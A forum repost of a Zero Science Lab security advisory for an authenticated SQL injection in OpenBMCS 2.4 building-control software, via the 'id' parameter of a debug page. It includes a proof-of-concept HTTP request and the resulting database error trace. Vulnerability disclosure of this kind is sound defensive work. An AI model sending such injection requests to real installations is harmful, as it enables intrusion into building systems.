• Важно
    Имате проблем со најава или регистрација на it.mk?
    Побарајте го решението на вашиот проблем ТУКА!

OpenBMCS 2.4 Authenticated SQL Injection

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
795
537
www.zeroscience.mk
Код:
OpenBMCS 2.4 Authenticated SQL Injection


Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via
the 'id' GET parameter is not properly sanitised before being returned to the
user or used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
           Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
           Apache/2.4.41 (Ubuntu)
           Apache/2.4.25 (Debian)
           nginx/1.16.1
           PHP/7.4.3
           PHP/7.0.33-0+deb9u9


Vulnerability discovered by Semen 'samincube' Rozhkov
                            @zeroscience


Advisory ID: ZSL-2022-5692
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php


26.10.2021

--


The following PoC request demonstrates the issue (authenticated user session is required):

GET /debug/obix_test.php?id=1%22 HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ssid123ssid123ssid1234ssid
Connection: close


Response:

HTTP/1.1 200 OK
Date: Sat, 1 Jan 2022 15:09:54 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 629
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>:  Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: &quot;&quot;&quot;' in /var/www/openBMCS/classes/dbconnection.php:146
Stack trace:
#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO-&gt;query('SELECT ip_addre...')
#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB-&gt;querySingle('SELECT ip_addre...', true)
#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1&quot;', '/obix/config')
#3 {main}
  thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />


 

Нови мислења

Последни Теми

Статистика

Теми
43.668
Мислења
889.315
Членови
31.509
Огласи
36
Најнов член
CapeNov
На врв Дно